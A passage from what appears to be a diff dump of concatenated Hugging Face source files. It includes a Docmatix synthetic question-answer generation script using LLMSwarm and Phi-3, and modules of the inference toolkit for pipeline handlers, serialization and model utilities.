focus of the first section?\n A1: The primary focus of the first section is...\n\n Q2: What are the significant details mentioned in the second section?\n A2: The significant details mentioned in the second section include...\n\n Q3: How does the information in the third section relate to the overall topic of the document?\n A3: The information in the third section relates to the overall topic by...\n '}, {'role_description': 'understand the content of the PDF and create as many pairs of questions and answers as you need to cover the content of the PDF comprehensively. The questions should require critical thinking and analysis.', 'examples': '\n Q1: What arguments does the author present in support of their thesis?\n A1: The arguments presented by the author in support of their thesis include...\n\n Q2: How does the author compare X and Y in the text?\n A2: The author compares X and Y by...\n\n Q3: What are the potential implications of the findings discussed in the document?\n A3: The potential implications of the findings are...\n '}, {'role_description': 'create as many pairs of questions and answers as you need to cover both summaries of sections and specific details. Ensure a coverage of broad themes and granular information.', 'examples': '\n Q1: What is the summary of the first section?\n A1: The summary of the first section is...\n\n Q2: What specific data or evidence is provided in the second section?\n A2: The specific data or evidence provided in the second section includes...\n\n Q3: How do the details in the third section support the main argument of the document?\n A3: The details in the third section support the main argument by...\n '}, {'role_description': 'understand the content of the PDF and create as many pairs of questions and answers as you need to cover the content of the PDF comprehensively. The questions should be varied, covering factual information, inferences, and deeper analysis of the text. 
The questions should be asked in a general manner without introducing details from the document itself.', 'examples': '\n Q1: What is the summary of the first section?\n A1: The first section, called xxx, can be summarized as is...\n\n Q2: What specific data or evidence is provided in the second section?\n A2: In the section called xxx, there is a much data and evidence presented, such as...\n\n Q3: How do the details in the third section support the main argument of the document?\n A3: The details in the section on "xxx" support the main argument by...\n '}]
405
+
406
+ def create_prompts(text):
407
+ prompts = []
408
+ for prompt in PROMPTS:
409
+ system_content = BASE_PROMPT.format(role_description=prompt['role_description'], examples=prompt['examples'])
410
+ prompts.append([{'role': 'system', 'content': system_content}, {'role': 'user', 'content': BASE_USER_CONTENT.format(text=text)}])
411
+ return prompts
412
+
413
+ # File: docmatix-main/generation/llm_swarm_script.py
414
+ import asyncio
415
+ import json
416
+ import os
417
+ import random
418
+ import re
419
+ from concurrent.futures import ThreadPoolExecutor
420
+ from typing import Any, Dict, List, Optional
421
+ import pandas as pd
422
+ from datasets import IterableDataset, load_dataset
423
+ from huggingface_hub import AsyncInferenceClient
424
+ from tqdm import trange
425
+ from tqdm.asyncio import tqdm_asyncio
426
+ from transformers import AutoTokenizer
427
+ from examples.question_answer_pairs.phase_1.base_prompts import BASE_PROMPT, BASE_USER_CONTENT, PROMPTS
428
+ from llm_swarm import LLMSwarm, LLMSwarmConfig
429
+ CHECKPOINT_FILE = 'checkpoint.json'
430
+ DATA_PATH = '/fsx/andi/pdfa_data/'
431
+ TAR_FILE_PATTERN = 'pdfa-eng-train-{:06d}.tar'
432
+ NUM_TAR_FILES = 1800
433
+ MAX_PAGES_PER_PDF = 4
434
+ STEP_SIZE = 10
435
+ model_id = 'microsoft/Phi-3-small-8k-instruct'
436
+
437
+ def create_llm_prompt(prompt, text):
438
+ system_content = BASE_PROMPT.format(role_description=prompt['role_description'], examples=prompt['examples'])
439
+ return [{'role': 'system', 'content': system_content}, {'role': 'user', 'content': BASE_USER_CONTENT.format(text=text)}]
440
+
441
+ def extract_text_per_page_from_sample(sample: Dict[str, Any]) -> List[str]:
442
+ texts = []
443
+ for page in sample['json']['pages']:
444
+ pages_text = ' \n '.join(page['lines']['text'])
445
+ texts.append(pages_text)
446
+ return texts
447
+
448
+ def extract_chunks(pages: List[Any], max_tokens_per_group: int, max_pages_per_group: int, n_overlap: int) -> List[str]:
449
+ chunks = []
450
+ current_chunk = []
451
+ current_chunk_tokens = 0
452
+ current_chunk_pages = 0
453
+ page_token_counts = [len(tokenizer.encode(page, add_special_tokens=False)) for page in pages]
454
+ for (i, page) in enumerate(pages):
455
+ page_tokens = page_token_counts[i]
456
+ if page_tokens > max_tokens_per_group:
457
+ print(f'Skipping document where page nr {i} has {page_tokens} tokens.')
458
+ return []
459
+ if current_chunk_tokens + page_tokens > max_tokens_per_group or current_chunk_pages + 1 > max_pages_per_group:
460
+ if current_chunk:
461
+ chunks.append('\nNEW PAGE\n'.join(current_chunk))
462
+ current_chunk = current_chunk[-n_overlap:] if n_overlap > 0 else []
463
+ current_chunk_tokens = sum(page_token_counts[max(0, i - n_overlap):i])
464
+ current_chunk_pages = len(current_chunk)
465
+ current_chunk.append(page)
466
+ current_chunk_tokens += page_tokens
467
+ current_chunk_pages += 1
468
+ if current_chunk:
469
+ chunks.append('\nNEW PAGE\n'.join(current_chunk))
470
+ return chunks
471
+
472
+ def create_tasks(dataset: IterableDataset, prompt_id: Optional[int]=None, n_overlap: int=2) -> List[Dict[str, Any]]:
473
+ if prompt_id is not None:
474
+ selected_id_prompt = prompt_id
475
+ tasks = []
476
+ for (index, sample) in dataset.iterrows():
477
+ text_per_page = extract_text_per_page_from_sample(sample)
478
+ if len(text_per_page) > MAX_PAGES_PER_PDF:
479
+ continue
480
+ page_chunks = extract_chunks(text_per_page, max_tokens_per_group=5000, max_pages_per_group=5, n_overlap=n_overlap)
481
+ for chunk in page_chunks:
482
+ if prompt_id is None:
483
+ selected_id_prompt = random.randint(0, 4)
484
+ prompt = PROMPTS[selected_id_prompt]
485
+ messages = create_llm_prompt(prompt, chunk)
486
+ prompt = tokenizer.apply_chat_template(messages, tokenize=False, add_generation_prompt=True)
487
+ tasks_dict = {'__key__': sample['__key__'], 'Page count': len(text_per_page), 'messages': prompt, 'Prompt ID': selected_id_prompt}
488
+ tasks.append(tasks_dict)
489
+ return tasks
490
+
491
+ def extract_qa_pairs(text):
492
+ qa_pattern = re.compile('(Q\\d+:\\s*.*?)(A\\d+:\\s*.*?)(?=(Q\\d+:)|$)', re.DOTALL)
493
+ matches = qa_pattern.findall(text)
494
+ qa_pairs = [(q.strip(), a.strip()) for match in matches for (q, a) in [match[:2]]]
495
+ return qa_pairs
496
+
497
+ def process_outputs_to_df(df):
498
+ all_data = []
499
+ for (index, row) in df.iterrows():
500
+ task = row['Task']
501
+ completion = row['Completion']
502
+ sample_key = task['__key__']
503
+ page_count = task['Page count']
504
+ prompt_id = task['Prompt ID']
505
+ qa_pairs = extract_qa_pairs(completion)
506
+ if len(qa_pairs) == 0:
507
+ print('No Q&A pairs found for sample:', sample_key)
508
+ for (question, answer) in qa_pairs:
509
+ all_data.append({'__key__': sample_key, 'Page count': page_count, 'Prompt ID': prompt_id, 'question': question, 'answer': answer})
510
+ qa_df = pd.DataFrame(all_data)
511
+ return qa_df
512
+
513
+ def save_checkpoint(tar_index, total_examples):
514
+ checkpoint_data = {'tar_index': tar_index, 'total_examples': total_examples}
515
+ with open(CHECKPOINT_FILE, 'w') as f:
516
+ json.dump(checkpoint_data, f)
517
+
518
+ def load_checkpoint():
519
+ if os.path.exists(CHECKPOINT_FILE):
520
+ with open(CHECKPOINT_FILE, 'r') as f:
521
+ return json.load(f)
522
+ return {'tar_index': 0, 'total_examples': 0}
523
+ tokenizer = AutoTokenizer.from_pretrained(model_id, trust_remote_code=True)
524
+
525
+ def launch():
526
+ with LLMSwarm(LLMSwarmConfig(instances=8, inference_engine='vllm', gpus=1, model=model_id, slurm_template_path='templates/vllm_h100.template.slurm', load_balancer_template_path='templates/nginx.template.conf', trust_remote_code=True, per_instance_max_parallel_requests=200)) as llm_swarm:
527
+ semaphore = asyncio.Semaphore(llm_swarm.suggested_max_parallel_requests)
528
+ client = AsyncInferenceClient(model=llm_swarm.endpoint)
529
+
530
+ async def process_text(prompt):
531
+ async with semaphore:
532
+ response = await client.post(json={'prompt': prompt, 'max_tokens': 2000})
533
+ res = json.loads(response.decode('utf-8'))['text'][0][len(prompt):]
534
+ return res
535
+
536
+ def load_and_process_dataset(tar_file):
537
+ try:
538
+ print(f'Loading dataset from: {tar_file}')
539
+ dataset = load_dataset('webdataset', split='train', data_files=tar_file).to_pandas()
540
+ tasks = create_tasks(dataset, prompt_id=None, n_overlap=1)
541
+ return tasks
542
+ except Exception as e:
543
+ print(f'Error loading dataset from: {tar_file}')
544
+ print(e)
545
+ return []
546
+
547
+ def get_future_tasks(tar_index, executor):
548
+ futures = []
549
+ for inner_idx in range(STEP_SIZE):
550
+ tar_file = os.path.join(DATA_PATH, TAR_FILE_PATTERN.format(tar_index + inner_idx))
551
+ futures.append(executor.submit(load_and_process_dataset, tar_file))
552
+ return futures
553
+
554
+ async def process_dataset(tar_index, total_examples):
555
+ next_future_tasks = get_future_tasks(tar_index, ThreadPoolExecutor(max_workers=STEP_SIZE))
556
+ for idx in trange(tar_index, NUM_TAR_FILES + STEP_SIZE, STEP_SIZE, desc='Creating Dataset'):
557
+ print(f'Processing tar file {idx}')
558
+ tasks = []
559
+ future_tasks = next_future_tasks
560
+ results = [f.result() for f in future_tasks]
561
+ for result in results:
562
+ tasks.extend(result)
563
+ next_future_tasks = get_future_tasks(idx + STEP_SIZE, ThreadPoolExecutor(max_workers=1))
564
+ results = await tqdm_asyncio.gather(*(process_text(task['messages']) for task in tasks))
565
+ df = pd.DataFrame({'Task': tasks, 'Completion': results})
566
+ df_new = process_outputs_to_df(df)
567
+ df_new.to_hdf(f'synthetic_dataset_batch_{idx}.h5', key='df', mode='w')
568
+ unique_keys = df_new['__key__'].nunique()
569
+ total_examples += unique_keys
570
+ save_checkpoint(idx, total_examples)
571
+
572
+ async def main():
573
+ checkpoint = load_checkpoint()
574
+ tar_index = checkpoint['tar_index']
575
+ if tar_index != 0:
576
+ tar_index += STEP_SIZE
577
+ print(f'Resuming from tar file {tar_index}')
578
+ total_examples = checkpoint['total_examples']
579
+ processor = asyncio.create_task(process_dataset(tar_index, total_examples))
580
+ await processor
581
+ print('All batches processed.')
582
+ asyncio.run(main())
583
+ launch()
584
+
585
+ # File: docmatix-main/zero_shot_exp/zero_shot.py
586
+ from datasets import Dataset, Features, Value, load_dataset, Image, Sequence
587
+ TEST_SUBSET_LEN = 200
588
+ TRAIN_SUBSET_LEN = 1700
589
+ FEATURES = Features({'images': Sequence(Image(decode=True)), 'texts': [{'user': Value('string'), 'assistant': Value('string'), 'source': Value('string')}]})
590
+ ds = load_dataset('HuggingFaceM4/Docmatix', 'images', streaming=True)
591
+ test_subset = []
592
+ train_subset = []
593
+ for (idx, sample) in enumerate(ds['train']):
594
+ if idx < TEST_SUBSET_LEN:
595
+ test_subset.append(sample)
596
+ if idx >= TEST_SUBSET_LEN - 1:
597
+ if idx >= TEST_SUBSET_LEN + TRAIN_SUBSET_LEN - 1:
598
+ break
599
+ train_subset.append(sample)
600
+ new_test_data = Dataset.from_list(test_subset, features=FEATURES)
601
+ new_train_data = Dataset.from_list(train_subset, features=FEATURES)
602
+ new_test_data.push_to_hub('HuggingFaceM4/Docmatix', 'zero-shot-exp', split='test')
603
+ new_train_data.push_to_hub('HuggingFaceM4/Docmatix', 'zero-shot-exp', split='train')
604
+
huggingface_evaluate.txt ADDED
The diff for this file is too large to render. See raw diff
 
huggingface_hugginface_datasets.txt ADDED
The diff for this file is too large to render. See raw diff
 
huggingface_huggingface-inference-toolkit.txt ADDED
@@ -0,0 +1,543 @@
1
+ # File: huggingface-inference-toolkit-main/src/huggingface_inference_toolkit/async_utils.py
2
+ import functools
3
+ from typing import Any, Callable, Dict, TypeVar
4
+ import anyio
5
+ from anyio import Semaphore
6
+ from typing_extensions import ParamSpec
7
+ MAX_CONCURRENT_THREADS = 1
8
+ MAX_THREADS_GUARD = Semaphore(MAX_CONCURRENT_THREADS)
9
+ T = TypeVar('T')
10
+ P = ParamSpec('P')
11
+
12
+ async def async_handler_call(handler: Callable[P, T], body: Dict[str, Any]) -> T:
13
+ async with MAX_THREADS_GUARD:
14
+ return await anyio.to_thread.run_sync(functools.partial(handler, body))
15
+
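As a rough illustration (not part of the toolkit itself), async_handler_call runs a blocking handler in a worker thread while the semaphore above keeps at most one call in flight:

import asyncio
from huggingface_inference_toolkit.async_utils import async_handler_call

def handler(body):
    # Stand-in for a synchronous pipeline call.
    return {'echo': body['inputs']}

print(asyncio.run(async_handler_call(handler, {'inputs': 'hello'})))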
16
+ # File: huggingface-inference-toolkit-main/src/huggingface_inference_toolkit/const.py
17
+ import os
18
+ from pathlib import Path
19
+ from huggingface_inference_toolkit.env_utils import strtobool
20
+ HF_MODEL_DIR = os.environ.get('HF_MODEL_DIR', '/opt/huggingface/model')
21
+ HF_MODEL_ID = os.environ.get('HF_MODEL_ID', None)
22
+ HF_TASK = os.environ.get('HF_TASK', None)
23
+ HF_FRAMEWORK = os.environ.get('HF_FRAMEWORK', None)
24
+ HF_REVISION = os.environ.get('HF_REVISION', None)
25
+ HF_HUB_TOKEN = os.environ.get('HF_HUB_TOKEN', None)
26
+ HF_TRUST_REMOTE_CODE = strtobool(os.environ.get('HF_TRUST_REMOTE_CODE', '0'))
27
+ HF_DEFAULT_PIPELINE_NAME = os.environ.get('HF_DEFAULT_PIPELINE_NAME', 'handler.py')
28
+ HF_MODULE_NAME = os.environ.get('HF_MODULE_NAME', f'{Path(HF_DEFAULT_PIPELINE_NAME).stem}.EndpointHandler')
29
+
30
+ # File: huggingface-inference-toolkit-main/src/huggingface_inference_toolkit/diffusers_utils.py
31
+ import importlib.util
32
+ from typing import Union
33
+ from transformers.utils.import_utils import is_torch_bf16_gpu_available
34
+ from huggingface_inference_toolkit.logging import logger
35
+ _diffusers = importlib.util.find_spec('diffusers') is not None
36
+
37
+ def is_diffusers_available():
38
+ return _diffusers
39
+ if is_diffusers_available():
40
+ import torch
41
+ from diffusers import AutoPipelineForText2Image, DPMSolverMultistepScheduler, StableDiffusionPipeline
42
+
43
+ class IEAutoPipelineForText2Image:
44
+
45
+ def __init__(self, model_dir: str, device: Union[str, None]=None, **kwargs):
46
+ dtype = torch.float32
47
+ if device == 'cuda':
48
+ dtype = torch.bfloat16 if is_torch_bf16_gpu_available() else torch.float16
49
+ device_map = 'balanced' if device == 'cuda' else None
50
+ self.pipeline = AutoPipelineForText2Image.from_pretrained(model_dir, torch_dtype=dtype, device_map=device_map, **kwargs)
51
+ if isinstance(self.pipeline, StableDiffusionPipeline):
52
+ try:
53
+ self.pipeline.scheduler = DPMSolverMultistepScheduler.from_config(self.pipeline.scheduler.config)
54
+ except Exception:
55
+ pass
56
+
57
+ def __call__(self, prompt, **kwargs):
58
+ if 'num_images_per_prompt' in kwargs:
59
+ kwargs.pop('num_images_per_prompt')
60
+ logger.warning('Sending num_images_per_prompt > 1 to pipeline is not supported. Using default value 1.')
61
+ out = self.pipeline(prompt, num_images_per_prompt=1, **kwargs)
62
+ return out.images[0]
63
+ DIFFUSERS_TASKS = {'text-to-image': IEAutoPipelineForText2Image}
64
+
65
+ def get_diffusers_pipeline(task=None, model_dir=None, device=-1, **kwargs):
66
+ device = 'cuda' if device == 0 else 'cpu'
67
+ pipeline = DIFFUSERS_TASKS[task](model_dir=model_dir, device=device, **kwargs)
68
+ return pipeline
69
+
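A usage sketch for the diffusers path; the model directory is a placeholder and a CUDA device is assumed (device index 0 maps to 'cuda' in get_diffusers_pipeline):

from huggingface_inference_toolkit.diffusers_utils import get_diffusers_pipeline

pipe = get_diffusers_pipeline(task='text-to-image', model_dir='./model', device=0)
# __call__ returns a single PIL image (num_images_per_prompt is forced to 1).
image = pipe('a watercolor painting of a lighthouse', num_inference_steps=25)
image.save('lighthouse.png')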
70
+ # File: huggingface-inference-toolkit-main/src/huggingface_inference_toolkit/env_utils.py
71
+ def strtobool(val: str) -> bool:
72
+ val = val.lower()
73
+ if val in ('y', 'yes', 't', 'true', 'on', '1'):
74
+ return True
75
+ if val in ('n', 'no', 'f', 'false', 'off', '0'):
76
+ return False
77
+ raise ValueError(f'Invalid truth value, it should be a string but {val} was provided instead.')
78
+
79
+ # File: huggingface-inference-toolkit-main/src/huggingface_inference_toolkit/handler.py
80
+ import os
81
+ from pathlib import Path
82
+ from typing import Optional, Union
83
+ from huggingface_inference_toolkit.const import HF_TRUST_REMOTE_CODE
84
+ from huggingface_inference_toolkit.utils import check_and_register_custom_pipeline_from_directory, get_pipeline
85
+
86
+ class HuggingFaceHandler:
87
+
88
+ def __init__(self, model_dir: Union[str, Path], task=None, framework='pt'):
89
+ self.pipeline = get_pipeline(model_dir=model_dir, task=task, framework=framework, trust_remote_code=HF_TRUST_REMOTE_CODE)
90
+
91
+ def __call__(self, data):
92
+ inputs = data.pop('inputs', data)
93
+ parameters = data.pop('parameters', None)
94
+ if parameters is not None:
95
+ prediction = self.pipeline(inputs, **parameters)
96
+ else:
97
+ prediction = self.pipeline(inputs)
98
+ return prediction
99
+
100
+ class VertexAIHandler(HuggingFaceHandler):
101
+
102
+ def __init__(self, model_dir: Union[str, Path], task=None, framework='pt'):
103
+ super().__init__(model_dir, task, framework)
104
+
105
+ def __call__(self, data):
106
+ if 'instances' not in data:
107
+ raise ValueError("The request body must contain a key 'instances' with a list of instances.")
108
+ parameters = data.pop('parameters', None)
109
+ predictions = []
110
+ for inputs in data['instances']:
111
+ payload = {'inputs': inputs, 'parameters': parameters}
112
+ predictions.append(super().__call__(payload))
113
+ return {'predictions': predictions}
114
+
115
+ def get_inference_handler_either_custom_or_default_handler(model_dir: Path, task: Optional[str]=None):
116
+ custom_pipeline = check_and_register_custom_pipeline_from_directory(model_dir)
117
+ if custom_pipeline:
118
+ return custom_pipeline
119
+ elif os.environ.get('AIP_MODE', None) == 'PREDICTION':
120
+ return VertexAIHandler(model_dir=model_dir, task=task)
121
+ else:
122
+ return HuggingFaceHandler(model_dir=model_dir, task=task)
123
+
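The default handler expects the same payload shape the webservice deserializes further below; a sketch with a hypothetical local model directory:

from huggingface_inference_toolkit.handler import HuggingFaceHandler

handler = HuggingFaceHandler(model_dir='./model', task='text-classification')
# 'parameters' is optional and forwarded to the pipeline as keyword arguments.
prediction = handler({'inputs': 'I love this movie!', 'parameters': {'top_k': 2}})
print(prediction)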
124
+ # File: huggingface-inference-toolkit-main/src/huggingface_inference_toolkit/logging.py
125
+ import logging
126
+ import sys
127
+
128
+ def setup_logging():
129
+ for handler in logging.root.handlers[:]:
130
+ logging.root.removeHandler(handler)
131
+ logging.basicConfig(level=logging.INFO, format='%(asctime)s - %(name)s - %(levelname)s - %(message)s', datefmt='%Y-%m-%d %H:%M:%S', stream=sys.stdout)
132
+ logging.getLogger('uvicorn').handlers.clear()
133
+ logging.getLogger('uvicorn.access').handlers.clear()
134
+ logging.getLogger('uvicorn.error').handlers.clear()
135
+ logger = logging.getLogger('huggingface_inference_toolkit')
136
+ return logger
137
+ logger = setup_logging()
138
+
139
+ # File: huggingface-inference-toolkit-main/src/huggingface_inference_toolkit/optimum_utils.py
140
+ import importlib.util
141
+ import os
142
+ from huggingface_inference_toolkit.logging import logger
143
+ _optimum_neuron = False
144
+ if importlib.util.find_spec('optimum') is not None:
145
+ if importlib.util.find_spec('optimum.neuron') is not None:
146
+ _optimum_neuron = True
147
+
148
+ def is_optimum_neuron_available():
149
+ return _optimum_neuron
150
+
151
+ def get_input_shapes(model_dir):
152
+ from transformers import AutoConfig
153
+ input_shapes = {}
154
+ input_shapes_available = False
155
+ try:
156
+ config = AutoConfig.from_pretrained(model_dir)
157
+ if hasattr(config, 'neuron'):
158
+ if config.neuron.get('static_batch_size', None) and config.neuron.get('static_sequence_length', None):
159
+ input_shapes['batch_size'] = config.neuron['static_batch_size']
160
+ input_shapes['sequence_length'] = config.neuron['static_sequence_length']
161
+ input_shapes_available = True
162
+ logger.info(f"Input shapes found in config file. Using input shapes from config with batch size {input_shapes['batch_size']} and sequence length {input_shapes['sequence_length']}")
163
+ else:
164
+ if os.environ.get('HF_OPTIMUM_BATCH_SIZE', None) is not None:
165
+ logger.warning('HF_OPTIMUM_BATCH_SIZE environment variable is set. Environment variable will be ignored and input shapes from config file will be used.')
166
+ if os.environ.get('HF_OPTIMUM_SEQUENCE_LENGTH', None) is not None:
167
+ logger.warning('HF_OPTIMUM_SEQUENCE_LENGTH environment variable is set. Environment variable will be ignored and input shapes from config file will be used.')
168
+ except Exception:
169
+ input_shapes_available = False
170
+ if input_shapes_available:
171
+ return input_shapes
172
+ sequence_length = os.environ.get('HF_OPTIMUM_SEQUENCE_LENGTH', None)
173
+ if sequence_length is None:
174
+ raise ValueError('HF_OPTIMUM_SEQUENCE_LENGTH environment variable is not set. Please set HF_OPTIMUM_SEQUENCE_LENGTH to a positive integer.')
175
+ if not int(sequence_length) > 0:
176
+ raise ValueError(f'HF_OPTIMUM_SEQUENCE_LENGTH must be set to a positive integer. Current value is {sequence_length}')
177
+ batch_size = os.environ.get('HF_OPTIMUM_BATCH_SIZE', 1)
178
+ logger.info(f'Using input shapes from environment variables with batch size {batch_size} and sequence length {sequence_length}')
179
+ return {'batch_size': int(batch_size), 'sequence_length': int(sequence_length)}
180
+
181
+ def get_optimum_neuron_pipeline(task, model_dir):
182
+ logger.info('Getting optimum neuron pipeline.')
183
+ from optimum.neuron.pipelines.transformers.base import NEURONX_SUPPORTED_TASKS, pipeline
184
+ from optimum.neuron.utils import NEURON_FILE_NAME
185
+ if not isinstance(model_dir, str):
186
+ model_dir = str(model_dir)
187
+ if task == 'sentence-embeddings':
188
+ task = 'feature-extraction'
189
+ if task not in NEURONX_SUPPORTED_TASKS:
190
+ raise ValueError(f'Task {task} is not supported by optimum neuron and inf2. Supported tasks are: {list(NEURONX_SUPPORTED_TASKS.keys())}')
191
+ export = True
192
+ if NEURON_FILE_NAME in os.listdir(model_dir):
193
+ export = False
194
+ if export:
195
+ logger.info('Model is not converted. Checking if required environment variables are set and converting model.')
196
+ input_shapes = get_input_shapes(model_dir)
197
+ neuron_pipe = pipeline(task, model=model_dir, export=export, input_shapes=input_shapes)
198
+ return neuron_pipe
199
+
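When the model is not pre-compiled and its config carries no neuron section, the static shapes come from environment variables; an illustrative sketch (values are arbitrary):

import os
from huggingface_inference_toolkit.optimum_utils import get_input_shapes

os.environ['HF_OPTIMUM_SEQUENCE_LENGTH'] = '128'  # required in this fallback path
os.environ['HF_OPTIMUM_BATCH_SIZE'] = '1'         # optional, defaults to 1
print(get_input_shapes('./model'))  # -> {'batch_size': 1, 'sequence_length': 128}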
200
+ # File: huggingface-inference-toolkit-main/src/huggingface_inference_toolkit/sentence_transformers_utils.py
201
+ import importlib.util
202
+ _sentence_transformers = importlib.util.find_spec('sentence_transformers') is not None
203
+
204
+ def is_sentence_transformers_available():
205
+ return _sentence_transformers
206
+ if is_sentence_transformers_available():
207
+ from sentence_transformers import CrossEncoder, SentenceTransformer, util
208
+
209
+ class SentenceSimilarityPipeline:
210
+
211
+ def __init__(self, model_dir: str, device: str=None, **kwargs):
212
+ self.model = SentenceTransformer(model_dir, device=device, **kwargs)
213
+
214
+ def __call__(self, inputs=None):
215
+ embeddings1 = self.model.encode(inputs['source_sentence'], convert_to_tensor=True)
216
+ embeddings2 = self.model.encode(inputs['sentences'], convert_to_tensor=True)
217
+ similarities = util.pytorch_cos_sim(embeddings1, embeddings2).tolist()[0]
218
+ return {'similarities': similarities}
219
+
220
+ class SentenceEmbeddingPipeline:
221
+
222
+ def __init__(self, model_dir: str, device: str=None, **kwargs):
223
+ self.model = SentenceTransformer(model_dir, device=device, **kwargs)
224
+
225
+ def __call__(self, inputs):
226
+ embeddings = self.model.encode(inputs).tolist()
227
+ return {'embeddings': embeddings}
228
+
229
+ class RankingPipeline:
230
+
231
+ def __init__(self, model_dir: str, device: str=None, **kwargs):
232
+ self.model = CrossEncoder(model_dir, device=device, **kwargs)
233
+
234
+ def __call__(self, inputs):
235
+ scores = self.model.predict(inputs).tolist()
236
+ return {'scores': scores}
237
+ SENTENCE_TRANSFORMERS_TASKS = {'sentence-similarity': SentenceSimilarityPipeline, 'sentence-embeddings': SentenceEmbeddingPipeline, 'sentence-ranking': RankingPipeline}
238
+
239
+ def get_sentence_transformers_pipeline(task=None, model_dir=None, device=-1, **kwargs):
240
+ device = 'cuda' if device == 0 else 'cpu'
241
+ kwargs.pop('tokenizer', None)
242
+ kwargs.pop('framework', None)
243
+ if task not in SENTENCE_TRANSFORMERS_TASKS:
244
+ raise ValueError(f"Unknown task {task}. Available tasks are: {', '.join(SENTENCE_TRANSFORMERS_TASKS.keys())}")
245
+ return SENTENCE_TRANSFORMERS_TASKS[task](model_dir=model_dir, device=device, **kwargs)
246
+
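Illustrative payloads for two of the sentence-transformers tasks above (the model directory is a placeholder; device=-1 selects CPU):

from huggingface_inference_toolkit.sentence_transformers_utils import get_sentence_transformers_pipeline

sim = get_sentence_transformers_pipeline(task='sentence-similarity', model_dir='./model', device=-1)
print(sim({'source_sentence': 'A cat sits on the mat.',
           'sentences': ['A feline rests on a rug.', 'Stocks fell sharply today.']}))

emb = get_sentence_transformers_pipeline(task='sentence-embeddings', model_dir='./model', device=-1)
print(len(emb('Hello world')['embeddings']))  # embedding dimension for a single sentence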
247
+ # File: huggingface-inference-toolkit-main/src/huggingface_inference_toolkit/serialization/base.py
248
+ from huggingface_inference_toolkit.serialization.audio_utils import Audioer
249
+ from huggingface_inference_toolkit.serialization.image_utils import Imager
250
+ from huggingface_inference_toolkit.serialization.json_utils import Jsoner
251
+ content_type_mapping = {'application/json': Jsoner, 'application/json; charset=UTF-8': Jsoner, 'text/csv': None, 'text/plain': None, 'image/png': Imager, 'image/jpeg': Imager, 'image/jpg': Imager, 'image/tiff': Imager, 'image/bmp': Imager, 'image/gif': Imager, 'image/webp': Imager, 'image/x-image': Imager, 'audio/x-flac': Audioer, 'audio/flac': Audioer, 'audio/mpeg': Audioer, 'audio/x-mpeg-3': Audioer, 'audio/wave': Audioer, 'audio/wav': Audioer, 'audio/x-wav': Audioer, 'audio/ogg': Audioer, 'audio/x-audio': Audioer, 'audio/webm': Audioer, 'audio/webm;codecs=opus': Audioer, 'audio/AMR': Audioer, 'audio/amr': Audioer, 'audio/AMR-WB': Audioer, 'audio/AMR-WB+': Audioer, 'audio/m4a': Audioer, 'audio/x-m4a': Audioer}
252
+
253
+ class ContentType:
254
+
255
+ @staticmethod
256
+ def get_deserializer(content_type):
257
+ if content_type in content_type_mapping:
258
+ return content_type_mapping[content_type]
259
+ else:
260
+ message = f'''\n Content type "{content_type}" not supported.\n Supported content types are:\n {', '.join(list(content_type_mapping.keys()))}\n '''
261
+ raise Exception(message)
262
+
263
+ @staticmethod
264
+ def get_serializer(accept):
265
+ if accept in content_type_mapping:
266
+ return content_type_mapping[accept]
267
+ else:
268
+ message = f'''\n Accept type "{accept}" not supported.\n Supported accept types are:\n {', '.join(list(content_type_mapping.keys()))}\n '''
269
+ raise Exception(message)
270
+
271
+ # File: huggingface-inference-toolkit-main/src/huggingface_inference_toolkit/serialization/image_utils.py
272
+ from io import BytesIO
273
+ from PIL import Image
274
+
275
+ class Imager:
276
+
277
+ @staticmethod
278
+ def deserialize(body):
279
+ image = Image.open(BytesIO(body)).convert('RGB')
280
+ return {'inputs': image}
281
+
282
+ @staticmethod
283
+ def serialize(image, accept=None):
284
+ if isinstance(image, Image.Image):
285
+ img_byte_arr = BytesIO()
286
+ image.save(img_byte_arr, format=accept.split('/')[-1].upper())
287
+ img_byte_arr = img_byte_arr.getvalue()
288
+ return img_byte_arr
289
+ else:
290
+ raise ValueError(f'Can only serialize PIL.Image.Image, got {type(image)}')
291
+
292
+ # File: huggingface-inference-toolkit-main/src/huggingface_inference_toolkit/serialization/json_utils.py
293
+ import base64
294
+ from io import BytesIO
295
+ import orjson
296
+ from PIL import Image
297
+
298
+ def default(obj):
299
+ if isinstance(obj, Image.Image):
300
+ with BytesIO() as out:
301
+ obj.save(out, format='PNG')
302
+ png_string = out.getvalue()
303
+ return base64.b64encode(png_string).decode('utf-8')
304
+ raise TypeError
305
+
306
+ class Jsoner:
307
+
308
+ @staticmethod
309
+ def deserialize(body):
310
+ return orjson.loads(body)
311
+
312
+ @staticmethod
313
+ def serialize(body, accept=None):
314
+ return orjson.dumps(body, option=orjson.OPT_SERIALIZE_NUMPY, default=default)
315
+
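A quick round trip through the JSON serializer, including the PIL fallback that base64-encodes images as PNG:

from PIL import Image
from huggingface_inference_toolkit.serialization.json_utils import Jsoner

payload = Jsoner.deserialize(b'{"inputs": "hello"}')
body = Jsoner.serialize({'label': 'POSITIVE', 'image': Image.new('RGB', (4, 4))})
print(payload, len(body))  # the image field is emitted as a base64 PNG string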
316
+ # File: huggingface-inference-toolkit-main/src/huggingface_inference_toolkit/utils.py
317
+ import importlib.util
318
+ import sys
319
+ from pathlib import Path
320
+ from typing import Optional, Union
321
+ from huggingface_hub import HfApi, login, snapshot_download
322
+ from transformers import WhisperForConditionalGeneration, pipeline
323
+ from transformers.file_utils import is_tf_available, is_torch_available
324
+ from transformers.pipelines import Pipeline
325
+ from huggingface_inference_toolkit.const import HF_DEFAULT_PIPELINE_NAME, HF_MODULE_NAME
326
+ from huggingface_inference_toolkit.diffusers_utils import get_diffusers_pipeline, is_diffusers_available
327
+ from huggingface_inference_toolkit.logging import logger
328
+ from huggingface_inference_toolkit.optimum_utils import get_optimum_neuron_pipeline, is_optimum_neuron_available
329
+ from huggingface_inference_toolkit.sentence_transformers_utils import get_sentence_transformers_pipeline, is_sentence_transformers_available
330
+ if is_tf_available():
331
+ import tensorflow as tf
332
+ if is_torch_available():
333
+ import torch
334
+ _optimum_available = importlib.util.find_spec('optimum') is not None
335
+
336
+ def is_optimum_available():
337
+ return False
338
+ framework2weight = {'pytorch': 'pytorch*', 'tensorflow': 'tf*', 'tf': 'tf*', 'pt': 'pytorch*', 'flax': 'flax*', 'rust': 'rust*', 'onnx': '*onnx*', 'safetensors': '*safetensors', 'coreml': '*mlmodel', 'tflite': '*tflite', 'savedmodel': '*tar.gz', 'openvino': '*openvino*', 'ckpt': '*ckpt'}
339
+
340
+ def create_artifact_filter(framework):
341
+ ignore_regex_list = list(set(framework2weight.values()))
342
+ pattern = framework2weight.get(framework, None)
343
+ if pattern in ignore_regex_list:
344
+ ignore_regex_list.remove(pattern)
345
